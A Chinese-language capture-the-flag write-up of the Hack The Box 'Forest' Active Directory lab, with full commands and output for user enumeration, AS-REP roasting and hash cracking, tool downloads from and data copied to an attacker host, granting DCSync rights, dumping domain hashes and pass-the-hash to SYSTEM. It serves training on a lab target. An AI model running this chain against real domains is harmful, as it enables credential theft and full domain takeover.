title: Hack The Box - Forest(算是个误配置吧) author: World'sEnd layout: true categories: 内网安全 tags:
• 打靶日记
有时候觉得自己真是一个怪人,在会员还有十几二十天时那种淡定从容,好像一切尽在掌控之中,摆烂几天后再登录看着所剩不多的倒计时,紧张感一下子就涌了出来。介于之前图床崩了,很多笔记的图片都无法正常显示了,今后我会尽量的不放图片。
Hack The Box - Forest
正如它的名字 "森林" 一样,这是一台活动目录的靶机,我觉得基础理论翻来覆去都那样,不如直接上手边打边学。即使触碰到知识盲区,一想到有搜索引擎做坚强后盾,底气也就有了。
端口探测:
# Nmap 7.92 scan initiated Thu Apr 21 13:07:05 2022 as: nmap -sC -sV -T4 -Pn -p- -oA nmap.txt 10.10.10.161
Nmap scan report for 10.10.10.161
Host is up (0.28s latency).
Not shown: 65511 closed tcp ports (reset)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-04-21 05:26:29Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49671/tcp open msrpc Microsoft Windows RPC
49676/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49677/tcp open msrpc Microsoft Windows RPC
49684/tcp open msrpc Microsoft Windows RPC
49706/tcp open msrpc Microsoft Windows RPC
49944/tcp open msrpc Microsoft Windows RPC
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 2h26m49s, deviation: 4h02m31s, median: 6m48s
| smb-security-mode:
| account_used:
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: FOREST
| NetBIOS computer name: FOREST\x00
| Domain name: htb.local
| Forest name: htb.local
| FQDN: FOREST.htb.local
|_ System time: 2022-04-20T22:27:25-07:00
| smb2-time:
| date: 2022-04-21T05:27:23
|_ start_date: 2022-04-21T05:09:30
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Apr 21 13:20:48 2022 -- 1 IP address (1 host up) scanned in 823.54 secondsDNS协议
可以被用来枚举目标存在域。就好比这样是存在的:
dig @10.10.10.161 htb.local
; <<>> DiG 9.18.0-2-Debian <<>> @10.10.10.161 htb.local
; (1 server found)
;; global options: +cmd
;; Got answer:
;; WARNING: .local is reserved for Multicast DNS
;; You are currently testing what happens when an mDNS query is leaked to DNS
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 27993
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4000
; COOKIE: 991c44b123319026 (echoed)
;; QUESTION SECTION:
;htb.local. IN A
;; ANSWER SECTION:
htb.local. 600 IN A 10.10.10.161
;; Query time: 91 msec
;; SERVER: 10.10.10.161#53(10.10.10.161) (UDP)
;; WHEN: Thu Apr 21 13:25:21 CST 2022
;; MSG SIZE rcvd: 66dig @10.10.10.161 forest.htb.local
; <<>> DiG 9.18.0-2-Debian <<>> @10.10.10.161 forest.htb.local
; (1 server found)
;; global options: +cmd
;; Got answer:
;; WARNING: .local is reserved for Multicast DNS
;; You are currently testing what happens when an mDNS query is leaked to DNS
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 19052
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4000
; COOKIE: e6fb2efd5a112ded (echoed)
;; QUESTION SECTION:
;forest.htb.local. IN A
;; ANSWER SECTION:
forest.htb.local. 3600 IN A 10.10.10.161
;; Query time: 787 msec
;; SERVER: 10.10.10.161#53(10.10.10.161) (UDP)
;; WHEN: Thu Apr 21 13:26:42 CST 2022
;; MSG SIZE rcvd: 73这样就是不存在的:
dig @10.10.10.161 baidu.com
; <<>> DiG 9.18.0-2-Debian <<>> @10.10.10.161 baidu.com
; (1 server found)
;; global options: +cmd
;; connection timed out; no servers could be reached我可以试着去从DNS服务器获取htb.local的副本,不过它失败了:
dig axfr @10.10.10.161 htb.local
; <<>> DiG 9.18.0-2-Debian <<>> axfr @10.10.10.161 htb.local
; (1 server found)
;; global options: +cmd
; Transfer failed.AXFR 是指在 DNS 区域传输期间使用的协议,当在主DNS服务器编辑内网区域信息后,为了方便可以从另一台DNS服务器通过AXFR获取到主DNS服务器中保存的内网区域信息,当然它肯定是有对应的身份验证授权校验的,就像这台靶机一样。如果没有的话,那就能够将主DNS服务器的信息下载下来,获取到域内所有主机列表,从而提供更多潜在的攻击向量。如果想了解的更细节一点可以看下这两篇文章:
https://www.acunetix.com/blog/articles/dns-zone-transfers-axfr/https://docs.microsoft.com/zh-cn/services-hub/health/remediation-steps-ad/configure-all-dns-zones-only-to-allow-zone-transfers-to-specified-ip-addressesKerberos协议:
它本身是存在用户名枚举漏洞,但是往往这些环境都需要定制字典,目前我对目标掌握的信息不支持我这样做。
RPC:
那么我可以看一下rpc,毕竟目标开了很多很多,我可以先试着不指定用户名与密码去连接,-U "" 表示用户名为空,-N 表示不要问我要密码:
$ rpcclient -U "" 10.10.10.161 -N
rpcclient $> 意外的是它竟然可以成功,看来目标开启了允许匿名访问,那么我可以搞一些事情。
枚举域内信息:
我可以列出用户列表:
rpcclient $> enumdomusersuser:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[$331000-VK4ADACQNUCA] rid:[0x463]
user:[SM_2c8eef0a09b545acb] rid:[0x464]
user:[SM_ca8c2ed5bdab4dc9b] rid:[0x465]
user:[SM_75a538d3025e4db9a] rid:[0x466]
user:[SM_681f53d4942840e18] rid:[0x467]
user:[SM_1b41c9286325456bb] rid:[0x468]
user:[SM_9b69f1b9d2cc45549] rid:[0x469]
user:[SM_7c96b981967141ebb] rid:[0x46a]
user:[SM_c75ee099d0a64c91b] rid:[0x46b]
user:[SM_1ffab36a2f5f479cb] rid:[0x46c]
user:[HealthMailboxc3d7722] rid:[0x46e]
user:[HealthMailboxfc9daad] rid:[0x46f]
user:[HealthMailboxc0a90c9] rid:[0x470]
user:[HealthMailbox670628e] rid:[0x471]
user:[HealthMailbox968e74d] rid:[0x472]
user:[HealthMailbox6ded678] rid:[0x473]
user:[HealthMailbox83d6781] rid:[0x474]
user:[HealthMailboxfd87238] rid:[0x475]
user:[HealthMailboxb01ac64] rid:[0x476]
user:[HealthMailbox7108a4e] rid:[0x477]
user:[HealthMailbox0659cc1] rid:[0x478]
user:[sebastien] rid:[0x479]
user:[lucinda] rid:[0x47a]
user:[svc-alfresco] rid:[0x47b]
user:[andy] rid:[0x47e]
user:[mark] rid:[0x47f]
user:[santi] rid:[0x480]我也可以列出组列表:
rpcclient $> enumdomgroupsgroup:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
group:[Domain Admins] rid:[0x200]
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Domain Controllers] rid:[0x204]
group:[Schema Admins] rid:[0x206]
group:[Enterprise Admins] rid:[0x207]
group:[Group Policy Creator Owners] rid:[0x208]
group:[Read-only Domain Controllers] rid:[0x209]
group:[Cloneable Domain Controllers] rid:[0x20a]
group:[Protected Users] rid:[0x20d]
group:[Key Admins] rid:[0x20e]
group:[Enterprise Key Admins] rid:[0x20f]
group:[DnsUpdateProxy] rid:[0x44e]
group:[Organization Management] rid:[0x450]
group:[Recipient Management] rid:[0x451]
group:[View-Only Organization Management] rid:[0x452]
group:[Public Folder Management] rid:[0x453]
group:[UM Management] rid:[0x454]
group:[Help Desk] rid:[0x455]
group:[Records Management] rid:[0x456]
group:[Discovery Management] rid:[0x457]
group:[Server Management] rid:[0x458]
group:[Delegated Setup] rid:[0x459]
group:[Hygiene Management] rid:[0x45a]
group:[Compliance Management] rid:[0x45b]
group:[Security Reader] rid:[0x45c]
group:[Security Administrator] rid:[0x45d]
group:[Exchange Servers] rid:[0x45e]
group:[Exchange Trusted Subsystem] rid:[0x45f]
group:[Managed Availability Servers] rid:[0x460]
group:[Exchange Windows Permissions] rid:[0x461]
group:[ExchangeLegacyInterop] rid:[0x462]
group:[$D31000-NSEL5BRJ63V7] rid:[0x46d]
group:[Service Accounts] rid:[0x47c]
group:[Privileged IT Accounts] rid:[0x47d]
group:[test] rid:[0x13ed]如果想查看某个用户或组的具体信息,rid便是它们的身份证号:
rpcclient $> querygroup 0x200
Group Name: Domain Admins
Description: Designated administrators of the domain
Group Attribute:7
Num Members:1例如 Domain Admins 的rid是 0x200,组中有一个成员,我想看看这个组成员是谁:
rpcclient $> querygroupmem 0x200
rid:[0x1f4] attr:[0x7]这样我就获取到了该成员的rid为0x1f4,那么我可以进一步的查看该成员的信息:
rpcclient $> queryuser 0x1f4
User Name : Administrator
Full Name : Administrator
Home Drive :
Dir Drive :
Profile Path:
Logon Script:
Description : Built-in account for administering the computer/domain
Workstations:
Comment :
Remote Dial :
Logon Time : 四, 21 4月 2022 13:10:14 CST
Logoff Time : 四, 01 1月 1970 08:00:00 CST
Kickoff Time : 四, 01 1月 1970 08:00:00 CST
Password last set Time : 二, 31 8月 2021 08:51:59 CST
Password can change Time : 三, 01 9月 2021 08:51:59 CST
Password must change Time: 四, 14 9月 30828 10:48:05 CST
unknown_2[0..31]...
user_rid : 0x1f4
group_rid: 0x201
acb_info : 0x00000010
fields_present: 0x00ffffff
logon_divs: 168
bad_password_count: 0x00000000
logon_count: 0x00000061
padding1[0..7]...
logon_hrs[0..21]...好吧,这是管理员账户。不多停留了,因为在刚刚我已经获取到了一些用户名,我可以通过Kerberos协议的缺陷去枚举用户名,那么就把它们去空处理做成字典吧:
user:[sebastien] rid:[0x479]
user:[lucinda] rid:[0x47a]
user:[svc-alfresco] rid:[0x47b]
user:[andy] rid:[0x47e]
user:[mark] rid:[0x47f]
user:[santi] rid:[0x480]
user:[Administrator] rid:[0x1f4]$ cat user.txt
sebastien
lucinda
svc-alfresco
andy
mark
santi
Administrator 我可以使用 Impacket 工具GetNPUsers.py尝试获取每个用户的哈希值:
$ for user in $(cat user.txt); do ../toolbox/posttool/impacket/examples/GetNPUsers.py -no-pass -dc-ip 10.10.10.161 htb/${user} | grep -v Impacket; done
[*] Getting TGT for sebastien
[-] User sebastien doesn't have UF_DONT_REQUIRE_PREAUTH set
[*] Getting TGT for lucinda
[-] User lucinda doesn't have UF_DONT_REQUIRE_PREAUTH set
[*] Getting TGT for svc-alfresco
$krb5asrep$23$svc-alfresco@HTB:de4a4c2f19b6081342bcfb429ba3b9e8$f064974a1b917b9c0d6d83624186daf2043c1723244057eaa119ad1b3ffcb0fbe6d5c9b50724120995cf4a49ea6d1e75e87bc55da51f92ad2336755ded774495e267658fdace2c710d60335c6a953d7bbc70e350c2f01e442019fc6a87be1926b03e5ef400e7ba4e3017e8424a62a5d555e42ff12d4623422a6a0a514a0cc9f6f2c15dd12a529889ebc9ab4a081fbd92e88c912aaec830a605379f4c241f991a56dab82b8ae0eac8954557ea77b348d83fe3076482a5c8f13dfdd32397f82cfeae82f0ab7fb281a6f9777bf486270cb39515dd31aca47e259b04d86f38dac9e4
[*] Getting TGT for andy
[-] User andy doesn't have UF_DONT_REQUIRE_PREAUTH set
[*] Getting TGT for mark
[-] User mark doesn't have UF_DONT_REQUIRE_PREAUTH set
[*] Getting TGT for santi
[-] User santi doesn't have UF_DONT_REQUIRE_PREAUTH set
[*] Getting TGT for Administrator
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[*] Getting TGT for Guest
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[*] Getting TGT for krbtgt
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[*] Getting TGT for DefaultAccount
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)获取密码:
看我找到了个倒霉蛋 svc-alfresco的哈希,那么我可以复制到文件hash.txt中去,然后对其暴力破解,**-m**参数是指定的类型,18200是kerberos票据类型的编号,那我为什么知道它的编号呢?我当然不是记的,如果仔细看哈希前会有$krb5asrep$,可以直接搜:
$ hashcat -h | grep "AS-REP"
18200 | Kerberos 5, etype 23, AS-REP | Network Protocol字典的话我选择kali自带的超级字典,如果第一次用的话需要人为的解压,就在**/usr/share/wordlists/**中,gunzip自行解压即可:
hashcat hash.txt -m 18200 /usr/share/wordlists/rockyou.txt --force很是轻松的就可以枚举出来:
* Create more work items to make use of your parallelization power:
https://hashcat.net/faq/morework
$krb5asrep$23$svc-alfresco@HTB:de4a4c2f19b6081342bcfb429ba3b9e8$f064974a1b917b9c0d6d83624186daf2043c1723244057eaa119ad1b3ffcb0fbe6d5c9b50724120995cf4a49ea6d1e75e87bc55da51f92ad2336755ded774495e267658fdace2c710d60335c6a953d7bbc70e350c2f01e442019fc6a87be1926b03e5ef400e7ba4e3017e8424a62a5d555e42ff12d4623422a6a0a514a0cc9f6f2c15dd12a529889ebc9ab4a081fbd92e88c912aaec830a605379f4c241f991a56dab82b8ae0eac8954557ea77b348d83fe3076482a5c8f13dfdd32397f82cfeae82f0ab7fb281a6f9777bf486270cb39515dd31aca47e259b04d86f38dac9e4:s3rvice
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 18200 (Kerberos 5, etype 23, AS-REP)
Hash.Target......: $krb5asrep$23$svc-alfresco@HTB:de4a4c2f19b6081342bc...dac9e4
Time.Started.....: Thu Apr 21 14:20:51 2022, (5 secs)
Time.Estimated...: Thu Apr 21 14:20:56 2022, (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 809.0 kH/s (0.59ms) @ Accel:256 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 4085760/14344385 (28.48%)
Rejected.........: 0/4085760 (0.00%)
Restore.Point....: 4084736/14344385 (28.48%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: s456822 -> s3r3ndipit
Hardware.Mon.#1..: Util: 55%
Started: Thu Apr 21 14:20:07 2022
Stopped: Thu Apr 21 14:20:57 2022获取svc-alfresco用户的shell:
那么我就可以通过evil-winrm以svc-alfresco用户去尝试登录目标机器:
$ evil-winrm -i 10.10.10.161 -u svc-alfresco -p s3rvice
Evil-WinRM shell v3.3
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> 这里藏着user.txt:
*Evil-WinRM* PS C:\users\svc-alfresco> cd desktop
*Evil-WinRM* PS C:\users\svc-alfresco\desktop> ls
Directory: C:\users\svc-alfresco\desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 4/20/2022 10:10 PM 34 user.txtBloodhound:
我想试试能否直接获取本地系统权限,我想给目标传送一个winPEAS,但是只有一些错误信息,对获取系统权限没什么帮助。好吧,既然是活动目录主题的靶机,那我应该就想着用活动目录的方式去打。
为了方便收集活动目录的信息,我想给目标传送一个ShareHound,如果直接通过wget下载会报错:
*Evil-WinRM* PS C:\users\svc-alfresco\desktop> wget http://10.10.16.7/SharpHound.ps1
The response content cannot be parsed because the Internet Explorer engine is not available, or Internet Explorer's first-launch configuration is not complete. Specify the UseBasicParsing parameter and try again.
At line:1 char:1
+ wget http://10.10.16.7/SharpHound.ps1
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotImplemented: (:) [Invoke-WebRequest], NotSupportedException
+ FullyQualifiedErrorId : WebCmdletIEDomNotSupportedException,Microsoft.PowerShell.Commands.InvokeWebRequestCommand
*Evil-WinRM* PS C:\users\svc-alfresco\desktop>报错不要紧,复制粘贴翻译,说我缺少 -UseBasicParsing 参数,加上就好,如果不加-O会不知道被下载到了哪里,那么正确的命令应该是这样:
wget http://10.10.16.7/SharpHound.exe -O SharpHound.exe -UseBasicParsing这样就可以获取到解压文件了:
Evil-WinRM* PS C:\users\svc-alfresco\desktop> ./SharpHound.exe
2022-04-21T01:27:25.3276403-07:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, Session, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2022-04-21T01:27:25.3471688-07:00|INFORMATION|Initializing SharpHound at 1:27 AM on 4/21/2022
2022-04-21T01:27:25.9839791-07:00|INFORMATION|Flags: Group, LocalAdmin, Session, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2022-04-21T01:27:26.4057549-07:00|INFORMATION|Beginning LDAP search for htb.local
2022-04-21T01:27:26.5151197-07:00|INFORMATION|Producer has finished, closing LDAP channel
2022-04-21T01:27:26.5307445-07:00|INFORMATION|LDAP channel closed, waiting for consumers
2022-04-21T01:27:56.4214323-07:00|INFORMATION|Status: 0 objects finished (+0 0)/s -- Using 47 MB RAM
2022-04-21T01:28:12.5777195-07:00|WARNING|[CommonLib LDAPUtils]Error getting forest, ENTDC sid is likely incorrect
2022-04-21T01:28:13.9214689-07:00|INFORMATION|Consumers finished, closing output channel
2022-04-21T01:28:13.9683427-07:00|INFORMATION|Output channel closed, waiting for output task to complete
Closing writers
2022-04-21T01:28:14.7652255-07:00|INFORMATION|Status: 162 objects finished (+162 3.375)/s -- Using 68 MB RAM
2022-04-21T01:28:14.7652255-07:00|INFORMATION|Enumeration finished in 00:00:48.3612383
2022-04-21T01:28:15.1714794-07:00|INFORMATION|SharpHound Enumeration Completed at 1:28 AM on 4/21/2022! Happy Graphing!
*Evil-WinRM* PS C:\users\svc-alfresco\desktop> ls
Directory: C:\users\svc-alfresco\desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 4/21/2022 1:28 AM 17654 20220421012812_BloodHound.zip
-a---- 4/21/2022 1:28 AM 19744 MzZhZTZmYjktOTM4NS00NDQ3LTk3OGItMmEyYTVjZjNiYTYw.bin
-a---- 4/21/2022 1:27 AM 906752 SharpHound.exe那我就该想想如何将解压文件传回到我的机器中了,目标没有python,我可以本地建一个个smb共享,在impacket工具包中的/examples目录下有smbserver脚本可以帮我完成这个目标:
./smbserver.py share . -smb2support -username whoami -password whoami
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed我可以到目标上建立共享链接:
*Evil-WinRM* PS C:\Users\svc-alfresco\desktop> net use \\10.10.16.7\share /u:whoami whoami
The command completed successfully.如果本地收到如下不明提示即表示有人成功建立了IPC链接:
[*] Incoming connection (10.10.10.161,54561)
[*] AUTHENTICATE_MESSAGE (\whoami,FOREST)
[*] User FOREST\whoami authenticated successfully
[*] whoami:::aaaaaaaaaaaaaaaa:e5d2af8a8c72fec009420964011c5d3a:01010000000000008081b81f5b55d801a0573b1afa0f638a000000000100100054006f004100730074004300550066000300100054006f00410073007400430055006600020010006f005700650046006a00680047005800040010006f005700650046006a00680047005800070008008081b81f5b55d80106000400020000000800300030000000000000000000000000200000c4fd92c6ff51a5536ef09a058707155d9058f51743879212d7870f9a4b4e34020a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310036002e003700000000000000000000000000
[*] Connecting Share(1:IPC$)
[*] Connecting Share(2:share)
[*] Disconnecting Share(1:IPC$)我可以到目标机器上复制生成zip到共享文件夹中:
copy 20220421012812_BloodHound.zip \\10.10.16.7\share\Bloodhound的安装我也顺便讲一下吧,我用的kalinux,linux中很简单,先安装环境依赖:
apt install neo4j然后启动,要sudo权限:
sudo neo4j console会刷新一些启动信息,刷新完后启动浏览器访问本地http://localhost:7474,数据库为空,选择用户认证,输入初始账号:密码,neo4j:neo4j,登录成功后会提示更改新密码。
再安装bloodhound:
apt install bloodhound然后就可以命令行中输入bloodhound启动了,账号还是neo4j,密码就看刚刚改成什么了。将zip文件上传,直接上传zip:
域建模:
我应该先清楚自己的定位,比如在左上角搜索框中输入当前的用户svc-alfresco,大小写不敏感:
可以在左边选择框中选择Find Shortest Paths to Domain Admins,找到域管理员的最短路径:
左上角的绿色人物标志就是我当前的位置,而右半部分那个绿色人物标志是域管理员。容我先捋一下它们之间的关系。
我当前的用户svc-alfresco是SERVICE ACCOUNTS@HTB.LOCAL组的成员,SERVICE ACCOUNTS@HTB.LOCAL组又隶属于PRIVILEGED IT ACCOUNTS@HTB.LOCAL,而PRIVILEGED IT ACCOUNTS@HTB.LOCAL又隶属于ACCOUNT OPERATORS@HTB.LOCAL而ACCOUNT OPERATORS@HTB.LOCAL对EXCHANGE WINDOWS PERMISSIONS@HTB.LOCAL有完全控制权,那么就相当于我当前用户svc-alfresco对EXCHANGE WINDOWS PERMISSIONS@HTB.LOCAL有完全控制权。
而EXCHANGE WINDOWS PERMISSIONS@HTB.LOCAL可以改写HTB.local域的访问控制权限。而HTB.local域对域管理所在的域 USER@HTB.LOCAL的父域,USER@HTB.LOCAL又包含域管理员所在组的DOMAIN ADMINS@HTB.LOCAL。
所以就是说,我当前用户svc-alfresco可以改写HTB.local域的访问控制列表,从而访问到 USER@HTB.LOCAL再看能否将自己添加到管理组中。
其实bloodhound会提供给我一些参考建议:
还是翻译一下吧:
完全控制群组,可以直接修改群组成员关系。
至少有两种方法可以执行此攻击。第一个也是最明显的方法是在Windows中使用内置的net.exe二进制文件(例如:net group "Domain Admins" harmj0y /add / Domain)。请参阅opsec考虑选项卡,了解为什么这可能是一个坏主意。第二种方法,也是强烈推荐的方法,是使用PowerView中的Add-DomainGroupMember函数。该函数在几个方面优于使用net.exe二进制文件。例如,您可以提供备用凭证,而不需要以具有AddMember特权的用户的身份运行进程或登录。此外,您有比刷出net.exe更安全的执行选项(参见opsec选项卡)。
要滥用PowerView的Add-DomainGroupMember权限,首先要将PowerView导入到你的代理会话或控制台的PowerShell实例中。如果没有将进程作为成员运行,则可能需要作为ACCOUNT OPERATORS@HTB.LOCAL的成员向域控制器进行身份验证。为了配合Add-DomainGroupMember,首先创建一个PSCredential对象(这些例子来自PowerView的帮助文档): 。
还会很贴心的匹配一些命令指令用以参考:
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force$Cred = New-Object System.Management.Automation.PSCredential('TESTLABdfm.a', $SecPassword)Add-DomainObjectAcl -Credential $Cred -TargetIdentity testlab.local -Rights DCSyncThen, use Add-DomainGroupMember, optionally specifying $Cred if you are not already running a process as ACCOUNT OPERATORS@HTB.LOCAL(然后,使用Add-DomainGroupMember,可选地指定$Cred,如果你还没有运行一个进程帐户OPERATORS@HTB.LOCAL):
Add-DomainGroupMember -Identity 'Domain Admins' -Members 'harmj0y' -Credential $CredFinally, verify that the user was successfully added to the group with PowerView's Get-DomainGroupMember(最后,使用PowerView的Get-DomainGroupMember验证用户已成功添加到组中):
Get-DomainGroupMember -Identity 'Domain Admins'域移动:
为此,我去了解了一下内网DCSync 攻击技术的利用。外文翻译过来的文章略显生硬。于是我找到了一篇国内的文章,这是原文链接:
https://www.freebuf.com/articles/network/286137.html我截图了一段我觉得比较关键的理论:
我可以把自己当成一台域控服务器,并向目标发起GetNCChanges请求,这样目标便会把它的数据同步给我,哇,它看起来太吸引人了。因为恰巧,我当前用户可以对ACL有更改权限,我可以赋予当前用户Dcsync权限。
这里我会借用另一款工具aclpwn:
git clone https://github.com/fox-it/aclpwn.py.gitpip install -r requirements.txt该工具运行时候可能会报错说no moudle
pip install neo4j.v1-i https://pypi.douban.com/simple --trust -host=pypi.douban.com可惜,我找了很多源也没有neo4j.v1这个包。没关系,我还有另一种方法,我需要先为其传送PowerView.ps1:
$ python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> wget http://10.10.16.7/PowerView.ps1 -O PowerView.ps1 -UseBasicParsing本机收到这消息即表示成功:
10.10.10.161 - - [21/Apr/2022 19:25:44] "GET /PowerView.ps1 HTTP/1.1" 200 -不过不着急,因为Hack The Box 靶机可能会有其他同僚在和我打同一台靶机,我不能将相对于靶机是默认配置的用户改掉,那样显得很不地道。所以我需要创建一个新用户,让它代替我当前用户去执行相关权限指令。
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> net user worldisend password /add /domain
The command completed successfully.
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> net group "Exchange Windows Permissions" worldisend /add
The command completed successfully.
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> net localgroup "Remote Management Users" worldisend /add
The command completed successfully.
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> net group "Exchange Windows Permissions"
Group name Exchange Windows Permissions
Comment This group contains Exchange servers that run Exchange cmdlets on behalf of users via the management service. Its members have permission to read and modify all Windows accounts and groups. This group should not be deleted.
Members
-------------------------------------------------------------------------------
worldisend
The command completed successfully.
可以看到我添加的worldisend出现在了Exchange Windows Permissions组中, 接下来导入PowerView:
. .\PowerView.ps1命令其实就是Bloodhound的提示参考:
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> $pass = convertto-securestring 'password' -AsPlainText -Force
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> $cred = New-Object System.Management.Automation.PSCredential('htb\worldisend', $pass)
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> Add-DomainObjectAcl -Credential $cred -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity worldisend -Rights DCSync
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> 这样子,我的 worldisend 就被赋予了DCSync权限,那么我可以通过impacket/examples目录下的secretsdump.py导出目标机器上保存的哈希,因为数据信息很多无关紧要,我只需要域管理员哈希就可以了:
./secretsdump.py worldisend:password@10.10.10.161
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:819af826bb148e603acb0f33d17632f8:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Cleaning up... 我可以通过impacket/examples目录下的psexec.py进行PTH移动到目标机器中:
$ ./psexec.py administrator@10.10.10.161 -hashes aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6 -no-pass
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
[*] Requesting shares on 10.10.10.161.....
[*] Found writable share ADMIN$
[*] Uploading file iwOctmbd.exe
[*] Opening SVCManager on 10.10.10.161.....
[*] Creating service HFuL on 10.10.10.161.....
[*] Starting service HFuL.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system获取root.txt:
C:\Users\Administrator\Desktop> dir
Volume in drive C has no label.
Volume Serial Number is 61F2-A88F
Directory of C:\Users\Administrator\Desktop
09/23/2019 02:15 PM .
09/23/2019 02:15 PM ..
04/20/2022 10:10 PM 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 10,408,390,656 bytes free
C:\Users\Administrator\Desktop> type root.txt